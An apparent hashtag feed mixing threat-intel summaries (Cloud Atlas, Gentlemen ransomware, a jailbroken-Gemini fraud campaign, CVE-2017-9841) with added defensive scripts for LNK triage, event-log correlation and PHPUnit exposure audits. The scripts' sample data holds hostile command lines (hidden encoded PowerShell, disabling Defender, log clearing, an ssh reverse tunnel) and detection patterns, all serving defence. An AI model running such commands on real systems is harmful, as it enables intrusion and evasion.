Cloud Atlas activity in the second half of 2025 and early 2026: new tools and a new payload

The Cloud Atlas APT group targeted government organizations and commercial companies in Russia and Belarus during late 2025 and early 2026, employing phishing campaigns with malicious ZIP archives containing LNK shortcuts. The attackers deployed multiple backdoors including VBCloud for file theft and PowerShower for network reconnaissance. New tools identified include PowerCloud, which exfiltrates data to Google Sheets, and browser checker utilities. The group established persistence through reverse SSH tunnels, patched OpenSSH binaries, ReverseSocks, and Tor networking. Initial infection vectors included malicious shortcuts executing PowerShell scripts and exploiting CVE-2018-0802 in Microsoft Office. The attackers performed credential theft, RDP manipulation via termsrv.dll patching, and lateral movement across networks while maintaining multiple backup control channels.

Pulse ID: 6a105530af26afbd3752ab81
Pulse Link: https://otx.alienvault.com/pulse/6a105530af26afbd3752ab81
Pulse Author: AlienVault
Created: 2026-05-22 13:08:00

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #Belarus #Browser #Cloud #CloudAtlas #CyberSecurity #Google #Government #InfoSec #LNK #Microsoft #MicrosoftOffice #OTX #Office #OpenThreatExchange #Phishing #PowerShell #RAT #RDP #Russia #SSH #ZIP #bot #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange
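The shortcut-in-a-ZIP lure in the pulse above is cheap to triage before anyone double-clicks it, because the .lnk format (MS-SHLLINK) stores the target and its arguments as plain StringData after a fixed 76-byte header. The following is an added example for this thread, not Cloud Atlas tooling or code from the report: a minimal shell-link parser plus a few heuristics (script-host target, encoded or hidden PowerShell switches, a minimised ShowCommand, arguments padded past what Explorer's properties dialog displays), run over two shortcuts the script builds in memory. The sample paths and arguments are constructed.

```python
"""Parse and triage a Windows shortcut (.lnk, MS-SHLLINK) for the "LNK launches PowerShell" pattern.

Added example for this thread, not Cloud Atlas tooling or any vendor's code. The two
shortcuts it inspects are constructed in memory by build_lnk(), so nothing touches disk.
"""
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046").bytes_le
# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional structures follow the header
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWNORMAL, SW_SHOWMINNOACTIVE = 1, 7   # ShowCommand 7 opens the target minimised, i.e. out of sight
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe")
SUSPICIOUS_ARGS = ("-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden",
                   "-ep bypass", "-executionpolicy bypass", "-nop", "iex ",
                   "downloadstring", "frombase64string")


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand, LinkFlags and the StringData fields of a shell link."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags, = struct.unpack_from("<I", data, 20)
    show_command, = struct.unpack_from("<I", data, 60)
    pos = 76
    if flags & HAS_IDLIST:                      # IDListSize (u16) followed by the item ID list
        size, = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINKINFO:                    # LinkInfoSize (u32) counts itself
        size, = struct.unpack_from("<I", data, pos)
        pos += size
    link = {"flags": flags, "show_command": show_command}
    for flag, key in STRING_FIELDS:             # StringData items appear in this fixed order
        if not flags & flag:
            continue
        count, = struct.unpack_from("<H", data, pos)
        pos += 2
        if flags & IS_UNICODE:
            link[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:                                   # ANSI strings use the system code page; cp1252 assumed here
            link[key] = data[pos:pos + count].decode("cp1252")
            pos += count
    return link


def triage(link: dict) -> list[str]:
    """Heuristic findings for a parsed shortcut; an empty list means nothing notable."""
    findings = []
    target = link.get("relative_path", "").lower().replace("/", "\\").rsplit("\\", 1)[-1]
    args = link.get("arguments", "").lower()
    if target in SCRIPT_HOSTS:
        findings.append(f"script-host-target:{target}")
    for token in SUSPICIOUS_ARGS:
        if token in args:
            findings.append(f"suspicious-argument:{token.strip()}")
    if link["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("hidden-window")
    if len(args) > 260:                         # more than the Target box in Explorer's properties dialog shows
        findings.append("oversized-arguments")
    return findings


def build_lnk(relative_path: str, arguments: str, show_command: int = SW_SHOWNORMAL) -> bytes:
    """Constructed sample: a minimal shell link carrying only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS."""
    flags = HAS_RELPATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sII", 0x4C, LNK_CLSID, flags, 0x20)      # 0x20 = FILE_ATTRIBUTE_ARCHIVE
    header += b"\0" * 24                                                # Creation/Access/Write FILETIMEs unset
    header += struct.pack("<IIIHHII", 0, 0, show_command, 0, 0, 0, 0)   # FileSize, IconIndex, ShowCommand, HotKey, Reserved1-3
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (relative_path, arguments))
    return header + body


# Constructed samples: a plain document shortcut and one in the phishing pattern described above
BENIGN_LNK = build_lnk("..\\Reports\\Q3-summary.docx", "")
MALICIOUS_LNK = build_lnk(
    "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "-nop -w hidden -ep bypass -enc " + "QQ" * 200,
    SW_SHOWMINNOACTIVE,
)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("malicious", MALICIOUS_LNK)):
        print(label, triage(parse_lnk(blob)) or ["no findings"])
```

Run it on a real file with parse_lnk(open(path, "rb").read()). The parser skips the LinkTargetIDList and LinkInfo blocks by their size fields and does not decode shell item IDs, so a shortcut whose target is carried only in the ID list (no RELATIVE_PATH) will show no target here; treat that as a reason to open it in a full LNK tool, not as a clean result.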

In the spirit of trying new things, I'm running Fedora 44 Workstation (i.e. Gnome50) on my laptop... whilst I run the KDE spin on my desktop.

I've noticed that setting up remote login on both is really easy... and using the default RDP viewer in KDE I can simply connect to my laptop... great.

However, trying to connect from my laptop to my desktop isn't working. (Firewalls have been configured, thanks).

Using the "Connections" app just fails to connect but never stops trying. I downloaded RustConn and that gives me an error telling me that it's spawned an external viewer (it hasn't) as the RDP server isn't compatible.

I can, however, connect to my desktop just fine from a Windows VM with the "Windows App" 🤢

Anyone have helpful suggestions?

#rdp #kde #gnome #fedora #linux

4 Steps to Easily Access #RDP Remote Desktop with #Windows #VPS

Read this guide, "4 Steps to Easily Access RDP Remote Desktop with Windows VPS" to connect your Windows VPS to RDP (remote desktop protocol). RDP technology also fulfills other IT needs. For example, some computers, such as rack-mounted servers in data centers, don't have input ...
Continued 👉 https://blog.radwebhosting.com/access-rdp-remote-desktop-with-windows-vps/?utm_source=mastodon&utm_medium=social&utm_campaign=mastodon.social #vpsguide #windowsserver #rdpserver #remotedesktopprotocol #microsoftremotedesktop #vpsservers #vpsplatform


The Gentleman Ransomware | Defense Evasion TTPs Uncovered

In April and May 2026, investigations revealed two incidents involving The Gentlemen ransomware-as-a-service operation, which has claimed over 400 victims across 70 countries since mid-2025. Both incidents demonstrated common tactics including Scheduled Tasks, PowerShell commands, and defense evasion techniques such as clearing Security, System, and Application Event Logs, disabling Microsoft Defender, and adding antivirus exclusions. A leaked internal database in early May exposed the operation's infrastructure, affiliate structure, and targeting of vulnerabilities like CVE-2024-55591. The attacks showed threat actors using RDP connections, disguised executables, SOCKS proxy connections for persistence, and domain-wide deployment via NETLOGON shares. Despite attempts to evade detection, sufficient forensic telemetry remained for analysis, revealing workstation names previously associated with Qilin ransomware and Lazarus infrastructure.

Pulse ID: 6a0f8f34dd916c38a643df30
Pulse Link: https://otx.alienvault.com/pulse/6a0f8f34dd916c38a643df30
Pulse Author: AlienVault
Created: 2026-05-21 23:03:16

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #ICS #InfoSec #Lazarus #Microsoft #MicrosoftDefender #OTX #OpenThreatExchange #PowerShell #Proxy #RAT #RDP #RansomWare #RansomwareAsAService #bot #AlienVault
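Both this pulse and the Cloud Atlas one above describe activity that leaves a recognisable trail in Windows event logs: log clears (Security 1102, System 104), Defender switched off or given exclusions (Defender/Operational 5001 and 5007, or the Set-MpPreference and Add-MpPreference command lines), schtasks /create, binaries run from a NETLOGON share, ssh -R reverse tunnels and writes to termsrv.dll. What follows is an added example, not code from either report: a per-host correlation that tags each event with a technique and alerts when two or more distinct techniques occur within fifteen minutes. The event records are constructed, and the JSON field names (host, time, channel, id, command_line, details) are an assumption about the export format.

```python
"""Correlate defence-evasion signals per host from Windows event records.

Added example for this thread, not code from the reports on The Gentlemen or Cloud Atlas.
Event IDs and command-line patterns are mapped to technique tags; one alert is raised per host
when enough distinct techniques land inside a short window. Records below are constructed and
the field names are an assumed export format.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

DEFENDER = "Microsoft-Windows-Windows Defender/Operational"
# Event IDs that are a technique on their own
EVENT_TECHNIQUES = {
    ("Security", 1102): "log-cleared",            # the audit log was cleared (written after the clear)
    ("System", 104): "log-cleared",               # System/Application log cleared (Eventlog provider)
    (DEFENDER, 5001): "defender-disabled",        # real-time protection disabled
    ("Security", 4698): "scheduled-task-created",
}
# Command lines (Security 4688 / Sysmon 1) that map to a technique
CMDLINE_TECHNIQUES = [
    (re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I), "log-cleared"),
    (re.compile(r"\bClear-EventLog\b", re.I), "log-cleared"),
    (re.compile(r"\bSet-MpPreference\b.*-Disable", re.I), "defender-disabled"),
    (re.compile(r"\bAdd-MpPreference\b.*-Exclusion", re.I), "defender-exclusion-added"),
    (re.compile(r"\bschtasks(\.exe)?\s+/create\b", re.I), "scheduled-task-created"),
    (re.compile(r"\\\\[^\\\s]+\\NETLOGON\\", re.I), "netlogon-share-execution"),
    (re.compile(r"\bssh(\.exe)?\b.*\s-R\s"), "reverse-ssh-tunnel"),   # case-sensitive: -R is the remote forward
    (re.compile(r"termsrv\.dll", re.I), "termsrv-tampering"),
]


def classify(event: dict) -> set[str]:
    """Technique tags for one event record (empty set when nothing matches)."""
    tags = set()
    tag = EVENT_TECHNIQUES.get((event["channel"], event["id"]))
    if tag:
        tags.add(tag)
    if (event["channel"], event["id"]) == (DEFENDER, 5007) and "Exclusions" in event.get("details", ""):
        tags.add("defender-exclusion-added")   # 5007 is any config change; only exclusion edits count here
    cmd = event.get("command_line", "")
    for pattern, tag in CMDLINE_TECHNIQUES:
        if pattern.search(cmd):
            tags.add(tag)
    return tags


def correlate(events, window=timedelta(minutes=15), min_techniques=2):
    """One alert per host whose tagged events show >= min_techniques distinct techniques within window."""
    by_host = defaultdict(list)
    for ev in events:
        for tag in classify(ev):
            by_host[ev["host"]].append((datetime.fromisoformat(ev["time"]), tag, ev["id"]))
    alerts = []
    for host, hits in by_host.items():
        hits.sort()
        for i, (start, _, _) in enumerate(hits):      # slide the window over each tagged event as a start
            in_window = [h for h in hits[i:] if h[0] - start <= window]
            techniques = sorted({h[1] for h in in_window})
            if len(techniques) >= min_techniques:
                alerts.append({"host": host, "first": start.isoformat(),
                               "last": in_window[-1][0].isoformat(),
                               "techniques": techniques,
                               "event_ids": sorted({h[2] for h in in_window})})
                break
    return alerts


SAMPLE_EVENTS = [   # constructed records; times are UTC, 203.0.113.10 is a documentation address
    {"host": "WS01", "time": "2026-05-10T02:14:05", "channel": "Security", "id": 4688,
     "command_line": 'schtasks.exe /create /tn "SystemUpdate" /tr C:\\ProgramData\\svc.exe /sc onlogon /ru SYSTEM'},
    {"host": "WS01", "time": "2026-05-10T02:14:40", "channel": "Security", "id": 4688,
     "command_line": 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"host": "WS01", "time": "2026-05-10T02:14:41", "channel": DEFENDER, "id": 5001,
     "details": "Real-time protection is disabled."},
    {"host": "WS01", "time": "2026-05-10T02:15:02", "channel": "Security", "id": 4688,
     "command_line": 'powershell.exe -c "Add-MpPreference -ExclusionPath C:\\ProgramData"'},
    {"host": "WS01", "time": "2026-05-10T02:15:03", "channel": DEFENDER, "id": 5007,
     "details": "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\ProgramData = 0x0"},
    {"host": "WS01", "time": "2026-05-10T02:21:30", "channel": "Security", "id": 4688,
     "command_line": "wevtutil.exe cl Security"},
    {"host": "WS01", "time": "2026-05-10T02:21:31", "channel": "Security", "id": 1102,
     "details": "The audit log was cleared."},
    {"host": "WS01", "time": "2026-05-10T02:28:00", "channel": "Security", "id": 4688,
     "command_line": "\\\\DC01\\NETLOGON\\update.exe"},
    {"host": "SRV03", "time": "2026-05-11T01:00:00", "channel": "Security", "id": 4688,
     "command_line": "ssh.exe -N -f -R 2222:127.0.0.1:3389 svc@203.0.113.10"},
    {"host": "SRV03", "time": "2026-05-11T01:02:00", "channel": "Security", "id": 4688,
     "command_line": "cmd.exe /c takeown /f C:\\Windows\\System32\\termsrv.dll"},
    {"host": "WS02", "time": "2026-05-10T09:00:00", "channel": "Security", "id": 4688,
     "command_line": "notepad.exe C:\\Users\\jdoe\\notes.txt"},
    {"host": "WS02", "time": "2026-05-10T09:05:00", "channel": DEFENDER, "id": 5007,
     "details": "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates\\AVSignatureVersion"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The command-line rules only fire if process creation auditing with command-line logging (or Sysmon event 1) is enabled; without it, only the event-ID rules work. Security 1102 is the one signal an attacker who clears the Security log cannot suppress by clearing, since it is written after the clear, so a host with a lone 1102 and no other telemetry is itself worth a look even though this correlation needs two techniques to alert.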


One Man, One AI, One Fake Persona: Inside the 5-Year Influence and Fraud 'Patriot Bait' Campaign

A solo Russian-speaking threat actor tracked as 'bandcampro' operated a five-year MAGA-themed Telegram channel with approximately 17,000 subscribers, initially forwarding cryptocurrency scam content before pivoting to AI-automated operations in September 2025. The actor utilized jailbroken Google Gemini to generate QAnon-styled posts, deploy infrastructure, manage stolen API keys, and run credential theft operations targeting politically engaged American audiences. The campaign weaponized cultural alignment with QAnon and MAGA communities to facilitate cryptocurrency fraud rather than political influence. Through AI assistance, the actor cracked 29 WordPress admin credentials, infiltrated at least one company, deployed remote access trojans disguised as cryptocurrency wallets, and operated a gamified chatbot called 'QFS 2.0 Terminal'. The operation demonstrates how frontier AI systems enable scalable, low-cost cybercriminal activities by allowing a single actor to perform tasks traditionally requiring enti...

Pulse ID: 6a0f8f3596d6a5268e168a10
Pulse Link: https://otx.alienvault.com/pulse/6a0f8f3596d6a5268e168a10
Pulse Author: AlienVault
Created: 2026-05-21 23:03:17

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #Google #InfoSec #IoT #OTX #OpenThreatExchange #RAT #RDP #RemoteAccessTrojan #Russia #Telegram #Trojan #Word #Wordpress #bot #cryptocurrency #AlienVault


Gnome Remote Desktop with Ubuntu 26.04 and MacOSX Tahoe 26.5 and Windows App 11.35 (2947) #rdp

https://askubuntu.com/q/1567029/612

I am trying to set up remote control for an ARM Parallels VM running Ubuntu 26.04 LTS, from the host Mac Mini M1. I am using Windows App (formerly Microsoft Remote Desktop) ver 11.35 (2947) on Taho...

9 Year-Old PHP Vulnerability Keeps Swinging As One of the Most Targeted Vulnerabilities

CVE-2017-9841, a remote code execution vulnerability in PHPUnit's eval-stdin.php file, remains highly exploited nearly a decade after disclosure. Analysis reveals over 80,000 exploitation attempts detected in 30 days, with 36,500 hits in the last 10 days alone. The vulnerability affects PHPUnit versions prior to 4.8.28 and 5.x before 5.6.3, allowing attackers to execute arbitrary PHP code via POST requests without authentication. Mass-scanning infrastructure targets dozens of framework-specific paths across Laravel, Drupal, Yii, and WordPress installations. Primary attack sources include compromised infrastructure in the UK and US, delivering webshells and botnet payloads. Multiple botnets including RondoDox, Kinsing, KashmirBlack, Sysrv, and Androxgh0st actively exploit this vulnerability. The persistent exploitation stems from developers failing to exclude development dependencies in production environments and exposing vendor directories to web servers.

Pulse ID: 6a0ca36a3571d3fbd4cd92bc
Pulse Link: https://otx.alienvault.com/pulse/6a0ca36a3571d3fbd4cd92bc
Pulse Author: AlienVault
Created: 2026-05-19 17:52:42

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AndroxGh0st #CyberSecurity #InfoSec #Kinsing #OTX #OpenThreatExchange #PHP #RCE #RDP #RemoteCodeExecution #UK #Vulnerability #Word #Wordpress #bot #botnet #developers #AlienVault
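The root cause the pulse names, dev dependencies deployed and vendor/ reachable from the web, is something you can check from the deployment itself rather than by replaying the exploit. The script below is an added example, not code from the report or from PHPUnit: it reads composer.lock, checks the phpunit/phpunit version against the fixed releases named above (4.8.28 and 5.6.3), verifies whether src/Util/PHP/eval-stdin.php is present and still reads php://input (the fix switched it to php://stdin), and works out the URL path it would have under a given document root. The project it audits is constructed in a temp dir; the package name acme/app and the directory layout are assumptions.

```python
"""Audit a PHP deployment for an exposed PHPUnit eval-stdin.php (CVE-2017-9841).

Added example for this thread, not code from the report or from PHPUnit. It finds the installed
phpunit/phpunit version in composer.lock, compares it with the fixed releases (4.8.28, 5.6.3),
checks whether eval-stdin.php is present and still reads php://input, and reports the URL path
it would have under the document root. build_sample_project() writes a constructed lock file
and vendor tree to a temp dir so the audit runs offline.
"""
import json
import os
import re
import tempfile

FIXED = {4: (4, 8, 28), 5: (5, 6, 3)}   # first safe release per affected major version
EVAL_STDIN = os.path.join("vendor", "phpunit", "phpunit", "src", "Util", "PHP", "eval-stdin.php")


def parse_version(text: str) -> tuple:
    """'v5.6.2' -> (5, 6, 2); pre-release suffixes are ignored."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unparseable version: {text}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable_version(text: str) -> bool:
    """Vulnerable before 4.8.28 (so any 3.x/4.x below it) and 5.x before 5.6.3; 6.0 shipped after the fix."""
    ver = parse_version(text)
    if ver[0] in FIXED:
        return ver < FIXED[ver[0]]
    return ver[0] < 4


def find_phpunit(lock: dict):
    """Return (version, dev_only) for phpunit/phpunit from composer.lock, or (None, None)."""
    for section, dev_only in (("packages", False), ("packages-dev", True)):
        for pkg in lock.get(section, []):
            if pkg.get("name") == "phpunit/phpunit":
                return pkg.get("version"), dev_only
    return None, None


def audit(project_dir: str, docroot: str) -> dict:
    """Combine lock-file, file-content and web-reachability checks into one verdict."""
    with open(os.path.join(project_dir, "composer.lock"), encoding="utf-8") as fh:
        version, dev_only = find_phpunit(json.load(fh))
    path = os.path.join(project_dir, EVAL_STDIN)
    present = os.path.isfile(path)
    uses_input = False
    if present:
        with open(path, encoding="utf-8", errors="replace") as fh:
            uses_input = "php://input" in fh.read()   # patched releases read php://stdin instead
    try:
        rel = os.path.relpath(path, docroot)          # lexical only: docroot need not exist
        web_path = None if rel.startswith("..") else "/" + rel.replace(os.sep, "/")
    except ValueError:                                # different drive on Windows: not under docroot
        web_path = None
    return {
        "version": version,
        "dev_only": dev_only,
        "vulnerable_version": bool(version) and is_vulnerable_version(version),
        "file_present": present,
        "uses_php_input": uses_input,
        "web_path": web_path if present else None,
        "exposed": present and uses_input and web_path is not None,
    }


def build_sample_project() -> str:
    """Constructed: a project served from its root (no public/), with dev dependencies installed."""
    root = tempfile.mkdtemp(prefix="phpunit-audit-")
    lock = {"packages": [{"name": "acme/app", "version": "1.0.0"}],          # assumed package name
            "packages-dev": [{"name": "phpunit/phpunit", "version": "5.6.2"}]}
    with open(os.path.join(root, "composer.lock"), "w", encoding="utf-8") as fh:
        json.dump(lock, fh)
    path = os.path.join(root, EVAL_STDIN)
    os.makedirs(os.path.dirname(path))
    with open(path, "w", encoding="utf-8") as fh:     # modelled on the pre-fix file: eval of php://input
        fh.write("<?php\neval('?>' . file_get_contents('php://input'));\n")
    return root


if __name__ == "__main__":
    project = build_sample_project()
    print(json.dumps(audit(project, docroot=project), indent=2))
```

Two fixes follow from the report: run composer install --no-dev on production hosts, and point the web server's document root at public/ (or deny /vendor/ in the server config) so nothing under vendor/ is reachable even if a dev dependency slips through. A web_path of None when the document root is public/ is the result you want to see; anything else is a path a scanner will eventually POST to.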


Over the weekend I was (by train) at the general assembly of a scouting-related association in Switzerland (#Kandersteg Scout Centre Association).
Around 150 people were there, aged between 18 and about 85 and from all corners of the world.
And it was incredibly pleasant how friendly, well-mannered and considerate everyone was with each other; experiences like that never fail to delight me.
#Pfadfinden #Scouting #WAGGGS #WOSM #KISC #rdp #BdP
